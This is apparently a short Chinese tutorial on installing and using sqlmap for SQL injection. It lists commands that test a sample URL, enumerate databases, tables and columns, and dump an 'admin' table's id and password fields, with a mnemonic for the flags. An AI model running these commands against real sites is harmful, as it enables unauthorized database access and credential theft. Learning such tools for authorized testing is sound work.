一、sqlmap安装
下载sqlmap,放到python下的新建文件夹sqlmap下,新建快捷方式cmd.exe,起始位置为sqlmap路径
二、sqlmap使用
1、
①、sqlmap -u “url”
②、sqlmap -u “url” --cookie=“burpsuite抓包获取的cookies值”
③、sqlmap -r “burpsuite抓到的数据包”
2、检查注入点:
sqlmap -u http://aa.com/star_photo.php?artist_id=11
3、爆所有数据库信息:
sqlmap -u http://aa.com/star_photo.php?artist_id=11 --dbs
4、爆当前数据库信息:
sqlmap -u http://aa.com/star_photo.php?artist_id=11 --current-db
5、指定库名列出所有表
sqlmap -u http://aa.com/star_photo.php?artist_id=11 -D vhost48330 --tables
‘vhost48330’ 为指定数据库名称
6、指定库名表名列出所有字段
sqlmap -u http://aa.com/star_photo.php?artist_id=11 -D vhost48330 -T admin --columns
‘admin’ 为指定表名称
7、指定库名表名字段dump出指定字段
sqlmap -u http://aa.com/star_photo.php?artist_id=11 -D vhost48330 -T admin -C ac,id,password --dump
‘ac,id,password’ 为指定字段名称
记忆小技巧:
1、-后面的参数分别为-D、-T、-C,分别对应dbs、tables、columns;
2、–后面的参数为希望爆出的信息,用完整的单词表示